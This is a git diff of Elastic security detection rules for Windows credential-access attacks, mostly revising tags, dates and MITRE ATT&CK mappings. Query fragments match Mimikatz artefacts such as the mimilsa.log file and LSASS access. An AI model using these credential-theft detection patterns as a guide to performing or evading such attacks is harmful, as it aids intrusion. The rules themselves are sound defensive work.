"OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_ldap_attributes.toml b/rules/windows/credential_access_ldap_attributes.toml index 9cb9ff680a5..e38375e2851 100644 --- a/rules/windows/credential_access_ldap_attributes.toml +++ b/rules/windows/credential_access_ldap_attributes.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/09" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -74,17 +74,7 @@ Audit Directory Service Access (Success,Failure) ``` """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Privilege Escalation", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Credential Access", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -118,41 +108,18 @@ any where host.os.type == "windows" and event.code == "4662" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.004" name = "Private Keys" reference = "https://attack.mitre.org/techniques/T1552/004/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.002" -name = "Domain Accounts" -reference = "https://attack.mitre.org/techniques/T1078/002/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/credential_access_lsass_loaded_susp_dll.toml b/rules/windows/credential_access_lsass_loaded_susp_dll.toml index cb444a5b057..1dedfaed505 100644 --- a/rules/windows/credential_access_lsass_loaded_susp_dll.toml +++ b/rules/windows/credential_access_lsass_loaded_susp_dll.toml @@ -2,7 +2,7 @@ creation_date = "2022/12/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -20,15 +20,7 @@ references = ["https://blog.xpnsec.com/exploring-mimikatz-part-2/", "https://git risk_score = 47 rule_id = "3a6001a0-0939-4bbe-86f4-47d8faeb7b97" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -142,19 +134,18 @@ The Local Security Authority Subsystem Service (LSASS) is crucial for managing s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" -[[rule.threat.technique.subtechnique]] -id = "T1003.001" -name = "LSASS Memory" -reference = "https://attack.mitre.org/techniques/T1003/001/" +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.005" +name = "Security Support Provider" +reference = "https://attack.mitre.org/techniques/T1547/005/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/credential_access_lsass_openprocess_api.toml b/rules/windows/credential_access_lsass_openprocess_api.toml index d6a78623f56..16fd4867621 100644 --- a/rules/windows/credential_access_lsass_openprocess_api.toml +++ b/rules/windows/credential_access_lsass_openprocess_api.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/02" integration = ["endpoint", "m365_defender"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -105,16 +105,7 @@ references = ["https://github.com/redcanaryco/atomic-red-team/blob/master/atomic risk_score = 47 rule_id = "ff4599cb-409f-4910-a239-52e4e6f532ff" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Microsoft Defender for Endpoint", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -161,31 +152,18 @@ from logs-endpoint.events.api-*, logs-m365_defender.event-* metadata _id, _versi [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/credential_access_machine_account_smb_relay.toml b/rules/windows/credential_access_machine_account_smb_relay.toml index 74eb4c912b9..528c8f6fb7d 100644 --- a/rules/windows/credential_access_machine_account_smb_relay.toml +++ b/rules/windows/credential_access_machine_account_smb_relay.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/16" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -82,24 +82,18 @@ file where host.os.type == "windows" and event.code == "5145" and endswith(user. [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1187" -name = "Forced Authentication" -reference = "https://attack.mitre.org/techniques/T1187/" [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" + [[rule.threat.technique.subtechnique]] id = "T1557.001" name = "LLMNR/NBT-NS Poisoning and SMB Relay" reference = "https://attack.mitre.org/techniques/T1557/001/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_mimikatz_memssp_default_logs.toml b/rules/windows/credential_access_mimikatz_memssp_default_logs.toml index cbc58475eaa..3605e41a057 100644 --- a/rules/windows/credential_access_mimikatz_memssp_default_logs.toml +++ b/rules/windows/credential_access_mimikatz_memssp_default_logs.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/31" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -73,19 +73,7 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -96,14 +84,31 @@ file where host.os.type == "windows" and file.name : "mimilsa.log" and process.n [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.005" +name = "Security Support Provider" +reference = "https://attack.mitre.org/techniques/T1547/005/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/credential_access_mimikatz_powershell_module.toml b/rules/windows/credential_access_mimikatz_powershell_module.toml index 19d4c6879de..2e5c4f9ded2 100644 --- a/rules/windows/credential_access_mimikatz_powershell_module.toml +++ b/rules/windows/credential_access_mimikatz_powershell_module.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -135,22 +135,26 @@ powershell.file.script_block_text:( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" - +[[rule.threat.technique]] +id = "T1649" +name = "Steal or Forge Authentication Certificates" +reference = "https://attack.mitre.org/techniques/T1649/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_mod_wdigest_security_provider.toml b/rules/windows/credential_access_mod_wdigest_security_provider.toml index d54be2d33fe..20494bd67fa 100644 --- a/rules/windows/credential_access_mod_wdigest_security_provider.toml +++ b/rules/windows/credential_access_mod_wdigest_security_provider.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -75,17 +75,7 @@ references = [ risk_score = 73 rule_id = "d703a5af-d5b0-43bd-8ddb-7a5d500b7da5" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint"] timestamp_override = "event.ingested" type = "eql" @@ -100,19 +90,26 @@ registry where host.os.type == "windows" and event.type in ("creation", "change" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" -[[rule.threat.technique.subtechnique]] -id = "T1003.001" -name = "LSASS Memory" -reference = "https://attack.mitre.org/techniques/T1003/001/" - +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/credential_access_moving_registry_hive_via_smb.toml b/rules/windows/credential_access_moving_registry_hive_via_smb.toml index 7dc0c02f2da..b16d5bc3658 100644 --- a/rules/windows/credential_access_moving_registry_hive_via_smb.toml +++ b/rules/windows/credential_access_moving_registry_hive_via_smb.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/16" integration = ["endpoint"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,15 +54,7 @@ references = ["https://www.elastic.co/security-labs/detect-credential-access"] risk_score = 47 rule_id = "a4c7473a-5cb4-4bc1-9d06-e4a75adbc494" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Tactic: Credential Access", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Exfiltration", "Resources: Investigation Guide", "Data Source: Elastic Defend"] timestamp_override = "event.ingested" type = "eql" @@ -83,36 +75,31 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.002" name = "Security Account Manager" reference = "https://attack.mitre.org/techniques/T1003/002/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.002" -name = "SMB/Windows Admin Shares" -reference = "https://attack.mitre.org/techniques/T1021/002/" - +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/windows/credential_access_persistence_network_logon_provider_modification.toml b/rules/windows/credential_access_persistence_network_logon_provider_modification.toml index 3f82b5ebbed..aaa45725f4f 100644 --- a/rules/windows/credential_access_persistence_network_logon_provider_modification.toml +++ b/rules/windows/credential_access_persistence_network_logon_provider_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/18" integration = ["endpoint", "m365_defender", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -151,26 +151,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.008" +name = "Network Provider DLL" +reference = "https://attack.mitre.org/techniques/T1556/008/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.008" +name = "Network Provider DLL" +reference = "https://attack.mitre.org/techniques/T1556/008/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/credential_access_posh_invoke_ninjacopy.toml b/rules/windows/credential_access_posh_invoke_ninjacopy.toml index 756fcb25eba..80fbae1a397 100644 --- a/rules/windows/credential_access_posh_invoke_ninjacopy.toml +++ b/rules/windows/credential_access_posh_invoke_ninjacopy.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/23" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -111,14 +111,7 @@ references = [ risk_score = 73 rule_id = "b8386923-b02c-4b94-986a-d223d9b01f88" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -142,10 +135,12 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.002" name = "Security Account Manager" @@ -156,43 +151,41 @@ id = "T1003.003" name = "NTDS" reference = "https://attack.mitre.org/techniques/T1003/003/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1006" +name = "Direct Volume Access" +reference = "https://attack.mitre.org/techniques/T1006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1006" -name = "Direct Volume Access" -reference = "https://attack.mitre.org/techniques/T1006/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_kerb_ticket_dump.toml b/rules/windows/credential_access_posh_kerb_ticket_dump.toml index 8039fe58cfc..e73e3c3e9ab 100644 --- a/rules/windows/credential_access_posh_kerb_ticket_dump.toml +++ b/rules/windows/credential_access_posh_kerb_ticket_dump.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/26" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -126,40 +126,16 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_minidump.toml b/rules/windows/credential_access_posh_minidump.toml index f417da3fdb8..6839473f031 100644 --- a/rules/windows/credential_access_posh_minidump.toml +++ b/rules/windows/credential_access_posh_minidump.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/05" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -112,14 +112,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide", - "Data Source: PowerShell Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] timestamp_override = "event.ingested" type = "query" @@ -130,40 +123,39 @@ event.category:process and host.os.type:windows and powershell.file.script_block [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_relay_tools.toml b/rules/windows/credential_access_posh_relay_tools.toml index 87be03b98ba..bb431c9bf71 100644 --- a/rules/windows/credential_access_posh_relay_tools.toml +++ b/rules/windows/credential_access_posh_relay_tools.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/27" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -98,14 +98,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide", - "Data Source: PowerShell Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Execution", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] timestamp_override = "event.ingested" type = "query" @@ -125,52 +118,57 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" +[[rule.threat.technique.subtechnique]] +id = "T1557.001" +name = "LLMNR/NBT-NS Poisoning and SMB Relay" +reference = "https://attack.mitre.org/techniques/T1557/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.002" name = "Pass the Hash" reference = "https://attack.mitre.org/techniques/T1550/002/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_request_ticket.toml b/rules/windows/credential_access_posh_request_ticket.toml index 3c2c8435952..033602a029e 100644 --- a/rules/windows/credential_access_posh_request_ticket.toml +++ b/rules/windows/credential_access_posh_request_ticket.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/24" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -98,14 +98,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide", - "Data Source: PowerShell Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] timestamp_override = "event.ingested" type = "query" @@ -123,45 +116,39 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" + [[rule.threat.technique.subtechnique]] id = "T1558.003" name = "Kerberoasting" reference = "https://attack.mitre.org/techniques/T1558/003/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_veeam_sql.toml b/rules/windows/credential_access_posh_veeam_sql.toml index fa457a50f0f..df4b429b3b9 100644 --- a/rules/windows/credential_access_posh_veeam_sql.toml +++ b/rules/windows/credential_access_posh_veeam_sql.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/14" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -140,40 +140,16 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml b/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml index bb46707c121..c5883618cf0 100644 --- a/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml +++ b/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml @@ -2,7 +2,7 @@ creation_date = "2022/04/30" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -68,21 +68,7 @@ references = [ risk_score = 73 rule_id = "4682fd2c-cfae-47ed-a543-9bed37657aa6" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -100,31 +86,13 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1212" -name = "Exploitation for Credential Access" -reference = "https://attack.mitre.org/techniques/T1212/" 